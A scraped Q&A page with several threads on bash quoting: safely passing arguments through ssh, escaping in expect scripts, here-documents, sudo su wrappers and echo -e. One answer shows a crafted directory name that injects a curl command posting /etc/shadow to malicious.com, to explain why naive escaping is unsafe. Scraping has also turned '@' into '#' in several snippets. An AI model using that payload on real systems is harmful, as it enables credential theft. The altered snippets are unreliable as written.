What does $"${#// /\\ }" mean in bash? - bash

When I read a Hadoop deploy script, I found the following code:
ssh $HADOOP_SSH_OPTS $slave $"${#// /\\ }"
The "${#// /\\ }" input is a simple shell command (parameter expansion). Why add a $ before this command? What does this $"" mean?

This code is simply buggy: It intends to escape the local script's argument list such that arguments with spaces can be transported over ssh, but it does this badly (missing some kinds of whitespace -- and numerous classes of metacharacters -- in exploitable ways), and uses $"" syntax (performing a translation table lookup) without any comprehensible reason to do so.
The Wrong Thing (aka: What It's Supposed To Do, And How It Fails)
Part 1: Describing The Problem
Passing a series of arguments to SSH does not guarantee that those arguments will come out the way they went in! SSH flattens its argument list to a single string, and transmits only that string to the remote system.
Thus:
# you might try to do this...
ssh remotehost printf '%s\n' "hello world" "goodbye world"
...looks exactly the same to the remote system as:
# but it comes out exactly the same as this
ssh remotehost 'printf %s\n hello world goodbye world'
...thus removing the effect of the quotes. If you want the effect of the first command, what you actually need is something like this:
ssh remotehost "printf '%s\n' \"hello world\" \"goodbye world\""
...where the command, with its quotes, are passed as a single argument to SSH.
Part 2: The Attempted Fix
The syntax "${var//string/replacement}" evaluates to the contents of $var, but with every instance of string replaced with replacement.
The syntax "$#" expands to the full list of arguments given to the current script.
"${#//string/replacement}" expands to the full list of arguments, but with each instance of string in each argument replaced with replacement.
Thus, "${#// /\\ }" expands to the full list of arguments, but with each space replaced with a string that prepends a single backslash to this space.
It thus modifies this:
# would be right as a local command, but not over ssh!
ssh remotehost printf '%s\n' 'hello world' 'goodbye world'
To this:
# ...but with "${#// /\\ }", it becomes this:
ssh remotehost printf '%s\n' 'hello\ world' 'goodbye\ world'
...which SSH munges into this:
# ...which behaves just like this, which actually works:
ssh remotehost 'printf %s\n hello\ world goodbye\ world'
Looks great, right? Except it's not.
Aside: What's the leading $ in $"${#/...//...}" for?
It's a bug here. It's valid syntax, because $"" has a useful meaning in bash (looking up the string as English text to see if there's a translation to the current user's native language), but there's no legitimate reason to do a translation table lookup here.
Why That Code Is Dangerously Buggy
There's a lot more you need to escape than spaces to make something safe for shell evaluation!
Let's say that you were running the following:
# copy directory structure to remote machine
src=/home/someuser/files
while read -r path; do
ssh "$host" "mkdir -p $path"
done < <(find /home/someuser/files -type d -printf '%P\0')
Looks pretty safe, right? But let's say that someuser is sloppy about their file permissions (or malicious), and someone does this:
mkdir $'/home/someuser/files/$(curl\t-X\tPOST\t-d\t/etc/shadow\thttp://malicious.com/)/'
Oh, no! Now, if you run that script with root permissions, you'll get your /etc/shadow sent to malicious.com, for them to try to crack your passwords at their leisure -- and the code given in your question won't help, because it only backslash-escapes spaces, not tabs or newlines, and it doesn't do anything about $() or backticks or other characters that can control the shell.
The Right Thing (Option 1: Consuming Stdin)
A safe and correct way to escape an argument list to be transported over ssh follows:
#!/bin/bash
# tell bash to put a quoted string which will, if expanded by bash, evaluate
# to the original arguments to this script into cmd_str
printf -v cmd_str '%q ' "$#"
# on the remote system, run "bash -s", with the script to run fed on stdin
# this guarantees that the remote shell is bash, which printf %q quoted content
# to be parsed by.
ssh "$slave" "bash -s" <<EOF
$cmd_str
EOF
There are some limitations inherent in this approach -- most particularly, it requires the remote command's stdin to be used for script content -- but it's safe even if the remote /bin/sh doesn't support bash extensions such as $''.
The Right Thing (Option 2: Using Python)
Unlike both bash and ksh's printf %q, the Python standard library's pipes.quote() (moved in 3.x to shlex.quote()) is guaranteed to generate POSIX-compliant output. We can use it as such:
posix_quote() {
python -c 'import pipes, sys; print " ".join([pipes.quote(x) for x in sys.argv[1:]])' "$#"
}
cmd_str=$(posix_quote "$#")
ssh "$slave" "$cmd_str"

Arguments to the script which contain whitespace need to be surrounded by quotes on the command line.
The ${#// /\\ } will quote this whitespace so that the expansion which takes place next will keep the whitespace as part of the argument for another command.
Anyway, probably an example is in order. Create a tst.sh with above line and make executable.
echo '#!/bin/bash' > tst.sh
echo 'ssh $HADOOP_SSH_OPTS $slave $"${#// /\\ }"' >> tst.sh
chmod +x tst.sh
try to run a mkdir command on the remote server, aka slave, of a directory containing spaces, assuming you have access to that server with user id uid:
HADOOP_SSH_OPTS="-l uid" slave=server ./tst.sh mkdir "/tmp/dir with spaces"
Because of the quoting of whitespace taking place, you'll now have a dir with spaces directory in /tmp on the server owned by uid.
Check using ssh uid#server ls /tmp
And if you're in a different country and really wanted some non-english character, that's maintained by surrounding with the $"...", aka locale-specific.

Related

How do I call Awk Print Variable within Expect Script that uses Spawn?

I've been creating some basic system health checks, and one of the checks includes a yum repo health status that uses one of Chef's tools called 'knife'. However, when I try to awk a column, I get
can't read "4": no such variable.
Here is what I am currently using:
read -s -p "enter password: " pass
/usr/bin/expect << EOF
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v| grep Repo-name| awk '{print $4}'\" "
expect {
-nocase password: { send "$pass\r" }; expect eof }
}
EOF
I've tried other variations as well, such as replacing the awk single quotes with double curly braces, escaping the variable, and even setting the variable to the command, and keep getting the same negative results:
awk {{print $4}}
awk '{print \$4}'
awk '\{print \$4\}'
awk {\{print \$4\}}
Does anyone know how I can pass this awk column selector variable within a spawned knife ssh command that sends the variable to the ssh host?
This line:
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v|grep Repo-name|awk '{print $4}'\""
has many layers of quoting (Tcl/Expect, ssh, bash, awk), and it's quoting of different types. Such things are usually pretty nasty and can require using rather a lot of backslashes to persuade values to go through the outer layers unmolested. In particular, Tcl and the shell both want to get their hands on variables whose uses start with $ and continue with alphanumerics. (Backslashes that go in deep need to be themselves quoted with more backslashes, making the code hard to read and hard to understand precisely.)
spawn knife ssh -m host1 "sudo bash -c \"yum repolist -v|grep Repo-name|awk '{print \\\$4}'\""
However, there's one big advantage available to us: we can put much of the code into braces at the outer level as we are not actually substituting anything from Tcl in there.
spawn knife ssh -m host1 {sudo bash -c "yum repolist -v|grep Repo-name|awk '{print \$4}'"}
The thing inside the braces is conventional shell code, not Tcl. And in fact we can probably simplify further, as neither grep nor awk need to be elevated:
spawn knife ssh -m host1 {sudo bash -c "yum repolist -v"|grep Repo-name|awk '{print $4}'}
Depending on the sudo configuration, you might even be able to do this (which I'd actually rather people did on systems I controlled anyway, rather than giving general access to root shells out):
spawn knife ssh -m host1 {sudo yum repolist -v|grep Repo-name|awk '{print $4}'}
And if my awk is good enough, you can get rid of the grep like this:
spawn knife ssh -m host1 {sudo yum repolist -v|awk '/Repo-name/{print $4}'}
This is starting to look more manageable. However, if you want to substitute Repo-name for a Tcl variable, you need a little more work that reintroduces a backslash, but now it is all much tamer than before as there's fewer layers of complexity to create headaches.
set repo "Repo-name"
spawn knife ssh -m host1 "sudo yum repolist -v|awk '/$repo/{print \$4}'"
In practice, I'd be more likely to get rid of the awk entirely and do that part in Tcl code, as well as setting up key-based direct access to the root account, allowing avoiding the sudo, but that's getting rather beyond the scope of your original question.
Donal Fellows' helpful answer contains great analysis and advice.
To complement it with an explanation of why replacing $4 with \\\$4 worked:
The goal is ultimately for awk to see $4 as-is, so we must escape for all intermediate layers in which $ has special meaning.
I'll use a simplified command in the examples below.
Let's start by temporarily eliminating the shell layer, by quoting the opening here-doc delimiter as 'EOF', which makes the content behave like a single-quoted string; i.e., the shell treats the content as a literal, without applying expansions:
expect <<'EOF' # EOF is quoted -> literal here-doc
spawn bash -c "awk '{ print \$1 }' <<<'hi there'"
expect eof
EOF
Output:
spawn bash -c awk '{ print $1 }' <<<'hi there'
hi
Note that $1 had to be escaped as \$1 to prevent expect from interpreting it as an expect variable reference.
Given that the here-doc in your question uses an unquoted opening here-doc delimiter (EOF), the shell treats the content as if it were a double-quoted string; i.e, shell expansions are applied.
Given that the shell now expands the script first, we must add an extra layer of escaping for the shell, by prepending two extra \ to \$1:
expect <<EOF # EOF is unquoted -> shell expansions happen
spawn bash -c "awk '{ print \\\$1 }' <<<'hi there'"
expect eof
EOF
This yields the same output as above.
Based on the rules of parsing an unquoted here-doc (which, as stated, is parsed like a double-quoted string), the shell turns \\ into a single \, and \$1 into literal $1, combining to literal \$1, which is what the expect script needs to see.
(Verify with echo "\\\$1" in the shell.)
Simplifying the approach with command-line arguments and a quoted here-doc:
As you can see, the multiple layers of quoting (escaping) can get confusing.
One way to avoid problems is to:
use a quoted here-doc, so that the shell doesn't interpret it in any way, so you can then focus on expect's quoting needs
pass any shell variable values via command-line arguments, and reference them from inside the expect script as expressions (either directly or by assigning them to an expect variable first).
expect -f - 'hi there' <<'EOF'
set txt [lindex $argv 0]
spawn bash -c "awk '{ print \$1 }' <<<'$txt'"
expect eof
EOF
Text hi there is passed as the 1st (and only) command-line argument, which can be referenced as [lindex $argv 0] in the script.
(-f - simply explicitly tells expect to read its script from stdin, which is necessary here to distinguish the script from the arguments).
set txt ... creates expect variable $txt, which can then be used unquoted or as part of double-quoted strings.
To create literal strings in expect, use {...} (the equivalent of the shell's '...').

read file in here document bash script

When I execute this, I get just empty lines as output
# /bin/bash <<- EOF
while read a
do
echo $a
done < /etc/fstab
EOF
If I copy the content of here-document into file and execute it, everything works as expected (I get content of /etc/fstab file).
Could anyone explain why?
UPDATE:
Answering a question about why would I need to pass here-doc to bash this way, here is what I'm actually trying to do:
ssh user#host /bin/bash <<- EOF
while read f; do
sed -i -e "s/$OLD_VAL/$NEW_VAL/g" $f
done < /tmp/list_of_files
EOF
Sed is complaining that $f is not set
In case someone bumps into this, here is a version that works:
# /bin/bash <<- EOF
while read a
do
echo \$a
done < /etc/fstab
EOF
The variable a is not defined in the parent bash script. It will be substituted with empty value before the here-document will be passed to a child bash. To avoid substitution a $-sign should be escaped with "\".
You dont need here document here. If you were trying a script you could do:
#!/bin/bash
while read a
do
echo "$a"
done < /etc/fstab
I do not have enough reputation here to add comments, so I am forced to answer instead.
First, you have multiple levels of shell going on. In your initial example, the syntax for your HERE doc was incorrect, but your edited update was correct. The <<- will remove one leading tab character (but not spaces) from each line of text until your EOF delimiter (which could have been named anything). Using << without the '-' would expect each line of the HEREdoc to start in column 0.
Next, you are using ssh getting your shell from a remote host. This also implies that your /tmp/list_of_files will also exist on the remote machine. This also means any local shell meta-character should be escaped to ensure it is passed to the program/location where you actually want it expanded.
I do not believe a HEREdoc is necessary, when you can pass a complete semicolon separated one-liner to ssh. This may also afford you some flexibility to let your local shell do some expansion before variables are passed to ssh or your remote shell.
OLD=' '
NEW=$'\t'
ssh -q user#host "for filename in \$(</tmp/list_of_files); do gsed -i.\$(date %s) -e 's/'$OLD'/'$NEW'/g' \$filename; done"
Let's not forget the -i is an in-place edit, not a flag to ignore the upper/lower case of our regex match. I like to create backups of my files any time I edit/change them so I have a history if/when anything breaks later.

Double quotes inside quotes in bash

I need pass $var_path to bash script inside single quotes and then get commnd executed on remote host. I know that single quotes do not allow passing variables, so tried double quoting, but getting error in sed. Assume this happens because its template uses " as well.
var="Test text"
var_path="/etc/file.txt"
echo "$var"|ssh root#$host 'cat - > /tmp/test.tmp && sed -n "/]/{:a;n;/}/b;p;ba}" $var_path > /tmp/new.conf.tmp'
so with ""
var="Test text"
var_path="/etc/file.txt"
echo "$var"|ssh root#$host "cat - > /tmp/test.tmp && sed -n "/]/{:a;n;/}/b;p;ba}" $var_path > /tmp/new.conf.tmp"
Errors from sed
sed: -e expression #1, char 0: unmatched `{'
./script.sh: line 4: n: command not found
./script.sh: line 4: /}/b: No such file or directory
./script.sh: line 4: p: command not found
If $var_path used directly without substitution script works as expected.
Arguments parsed as part of the command to send to the remote system in SSH in the are concatenated with spaces and then passed to the remote shell (in a manner similar to "${SHELL:-sh}" -c "$*"). Fortunately, bash has the built-in printf %q operation (an extension, so not available in all other POSIX shells) to make strings eval-safe, and thus ssh-safe, if your remote SHELL is bash; see the end of this answer for a workaround using Python's shlex module to generate a command safe in non-bash shells.
So, if you have a command that works locally, the first step is to put it into an array (notice also the quotes around the expansion of "$var_path" -- these are necessary to have an unambiguous grouping):
cmd=( sed -n '/]/{:a;n;/}/b;p;ba}' "$var_path" )
...which you can run locally to test:
"${cmd[#]}"
...or transform into an eval-safe string:
printf -v cmd_str '%q ' "${cmd[#]}"
...and then run it locally with ssh...
ssh remote_host "$cmd_str"
...or test it locally with eval:
eval "$cmd_str"
Now, your specific use case has some exceptions -- things that would need to be quoted or escaped to use them as literal commands, but which can't be quoted if you want them to retain their special meaning. &&, | and > are examples. Fortunately, you can work around this by building those parts of the string yourself:
ssh remote_host "cat - >/tmp/test.tmp && $cmd_str >/tmp/new.conf.tmp"
...which is equivalent to the local array expansion...
cat - >/tmp/test.tmp && "${cmd[#]}" >/tmp/new.conf.tmp
...or the local eval...
eval "cat - >/tmp/test.tmp && $cmd_str >/tmp/new.conf.tmp"
Addendum: Supporting Non-Bash Remote Shells
One caveat: printf %q is guaranteed to quote things in such a way that bash (or ksh, if you're using printf %q in ksh locally) will evaluate them to exactly match the input. If you had a target system with a shell which didn't support extensions to POSIX such as $'', this guarantee would no longer be available, and more interesting techniques become necessary to guarantee robustness in the face of the full range of possible inputs.
Fortunately, the Python standard library includes a function to escape arbitrary strings for any POSIX-compliant shell:
quote_string() {
python -c '
import sys
try:
from pipes import quote # Python 2
except ImportError:
from shlex import quote # Python 3
print(" ".join([quote(x) for x in sys.argv[1:]]))
' "$#"
}
Thereafter, when you need an equivalent to printf '%q ' "$#" that works even when the remote shell is not bash, you can run:
cmd_str=$(quote_string "${cmd[#]}")
Once you use double quotes the embedded command can simply use single quotes. This works because double quote variable substitutions treat embedded single quotes as regular characters... nothing special.
var="Test text"
var_path="/etc/file.txt";
echo "$var"|ssh root#$host "cat - > /tmp/test.tmp && sed -n '/]/{:a;n;/}/b;p;ba}' $var_path > /tmp/new.conf.tmp"
If you wanted to assign and use variables within the double quotes that would be more tricky.
root#anywhere is dangerous... is there no other way? If you are using certificates I hope they restrict root to specific commands.

bash parameter variables in script problem

I have a script I wrote for switching to root or running a command as root without a password. I edited my /etc/sudoers file so that my user [matt] has permission to run /bin/su with no password. This is my script "s" contents:
matt: ~ $ cat ~/bin/s
#!/bin/bash
[ "$1" != "" ] && c='-c'
sudo su $c "$*"
If there are no parameters [simply s], it basically calls sudo su which goes to root with no password. But if I put paramaters, the $c variable equals "-c", which makes su execute a single command.
It works good, except for when I need to use spaces. For example:
matt: ~ $ touch file\ with\ spaces
matt: ~ $ s chown matt file\ with\ spaces
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file with spaces'
chown: cannot access 'file': No such file or directory
chown: cannot access 'with': No such file or directory
chown: cannot access 'spaces': No such file or directory
matt: ~ $ s chown matt 'file\ with\ spaces'
matt: ~ $
How can I fix this?
Also, what's the difference between $* and $# ?
Ah, fun with quoting. Usually, the approach #John suggests will work for this: use "$#", and it won't try to interpret (and get confused by) the spaces and other funny characters in your parameters. In this case, however, that won't work because su's -c option expects the entire command to be passed as a single parameter, and then it'll start a new shell which parses the command (including getting confused by spaces and such). In order to avoid this, you actually need to re-quote the parameters within the string you're going to pass to su -c. bash's printf builtin can do this:
#!/bin/bash
if [ $# -gt 0 ]; then
sudo su -c "$(printf "%q " "$#")"
else
sudo su
fi
Let me go over what's happening here:
You run a command like s chown matt file\ with\ spaces
bash parses this into a list of words: "s" "chown" "matt" "file with spaces". Note that at this point the escapes you typed have been removed (although they had their intended effect: making bash treat those spaces as part of a parameter, rather than separators between parameters).
When bash parses the printf "%q " "$#" command in the script, it replaces "$#" with the arguments to the script, with parameter breaks intact. It's equivalent to printf "%q " "chown" "matt" "file with spaces".
printf interprets the format string "%q " to mean "print each remaining parameter in quoted form, with a space after it". It prints: "chown matt file\ with\ spaces ", essentially reconstructing the original command line (it has an extra space on the end, but this turns out not to be a problem).
This is then passed to sudo as a parameter (since there are double-quotes around the $() construct, it'll be treated as a single parameter to sudo). This is equivalent to running sudo su -c "chown matt file\ with\ spaces ".
sudo runs su, and passes along the rest of the parameter list it got including the fully escaped command.
su runs a shell, and it also passes along the rest of its parameter list.
The shell executes the command it got as an argument to -c: chown matt file\ with\ spaces. In the normal course of parsing it, it'll interpret the unescaped spaces as separators between parameters, and the escaped spaces as part of a parameter, and it'll ignore the extra space at the end.
The shell runs chown, with the parameters "matt" and "file with spaces". This does what you expected.
Isn't bash parsing a hoot?
"$*" collects all the positional parameters ($1, $2, …) into a single word, separated by one space (more generally, the first character of $IFS). Note that in shell terminology, a word can include any character including spaces: "foo bar" or foo\ bar parses to a single word. For example, if there are three arguments, then "$*" is equivalent to "$1 $2 $3". If there is no argument, then "$*" is equivalent to "" (an empty word).
"$#" is a special syntax that expands to the list of positional parameters, each in its own word. For example, if there are three arguments, then "$#" is equivalent to "$1" "$2" "$3". If there is no argument, then "$#" is equivalent to nothing (an empty list, not a list with one word that is empty).
"$#" is almost always what you want to use, as opposed to "$*", or unquoted $* or $# (the last two are exactly equivalent and perform filename generation (a.k.a. globbing) and word splitting on all the positional parameters).
There's an additional problem, which is that su except a single shell command as the argument of -c, and you're passing it multiple words. You've had a detailed explanation of getting the quoting right, but let me add advice on how to do it right, which sidesteps the double quoting issues. You may also want to refer to https://unix.stackexchange.com/questions/3063/how-do-i-run-a-command-as-the-system-administrator-root for more background on sudo and su.
sudo already runs a command as root, so there's no need to invoke su. In case your script has no argument , you can just run a shell directly; unless your version of sudo is very old, there's an option for that: sudo -s. So your script can be:
#!/bin/sh
if [ $# -eq 0 ]; then set -- -s; else set -- -- "$#"; fi
exec sudo "$#"
(The else part is to handle the rare case of a command that begins with -.)
I wouldn't bother with such a short script though. Running a command as root is unusual and risky enough that typing the three extra characters shouldn't be a problem. Running a shell as root is even more unusual and risky and surely deserves six more characters.

echo outputs -e parameter in bash scripts. How can I prevent this?

I've read the man pages on echo, and it tells me that the -e parameter will allow an escaped character, such as an escaped n for newline, to have its special meaning. When I type the command
$ echo -e 'foo\nbar'
into an interactive bash shell, I get the expected output:
foo
bar
But when I use this same command (i've tried this command character for character as a test case) I get the following output:
-e foo
bar
It's as if echo is interpretting the -e as a parameter (because the newline still shows up) yet also it interprets the -e as a string to echo. What's going on here? How can I prevent the -e showing up?
You need to use #!/bin/bash as the first line in your script. If you don't, or if you use #!/bin/sh, the script will be run by the Bourne shell and its echo doesn't recognize the -e option. In general, it is recommended that all new scripts use printf instead of echo if portability is important.
In Ubuntu, sh is provided by a symlink to /bin/dash.
Different implementations of echo behave in annoyingly different ways. Some don't take options (i.e. will simply echo -e as you describe) and automatically interpret escape sequences in their parameters. Some take flags, and don't interpret escapes unless given the -e flag. Some take flags, and interpret different escape sequences depending on whether the -e flag was passed. Some will cause you to tear your hair out if you try to get them to behave in a predictable manner... oh, wait, that's all of them.
What you're probably seeing here is a difference between the version of echo built into bash vs /bin/echo or maybe vs. some other shell's builtin. This bit me when Mac OS X v10.5 shipped with a bash builtin echo that echoed flags, unlike what all my scripts expected...
In any case, there's a solution: use printf instead. It always interprets escape sequences in its first argument (the format string). The problems are that it doesn't automatically add a newline (so you have to remember do that explicitly), and it also interprets % sequences in its first argument (it is, after all, a format string). Generally, you want to put all the formatting stuff in the format string, then put variable strings in the rest of the arguments so you can control how they're interpreted by which % format you use to interpolate them into the output. Some examples:
printf "foo\nbar\n" # this does what you're trying to do in the example
printf "%s\n" "$var" # behaves like 'echo "$var"', except escapes will never be interpreted
printf "%b\n" "$var" # behaves like 'echo "$var"', except escapes will always be interpreted
printf "%b\n" "foo\nbar" # also does your example
Use
alias echo /usr/bin/echo
to force 'echo' invoking coreutils' echo which interpret '-e' parameter.
Try this:
import subprocess
def bash_command(cmd):
subprocess.Popen(['/bin/bash', '-c', cmd])
code="abcde"
// you can use echo options such as -e
bash_command('echo -e "'+code+'"')
Source: http://www.saltycrane.com/blog/2011/04/how-use-bash-shell-python-subprocess-instead-binsh/

Resources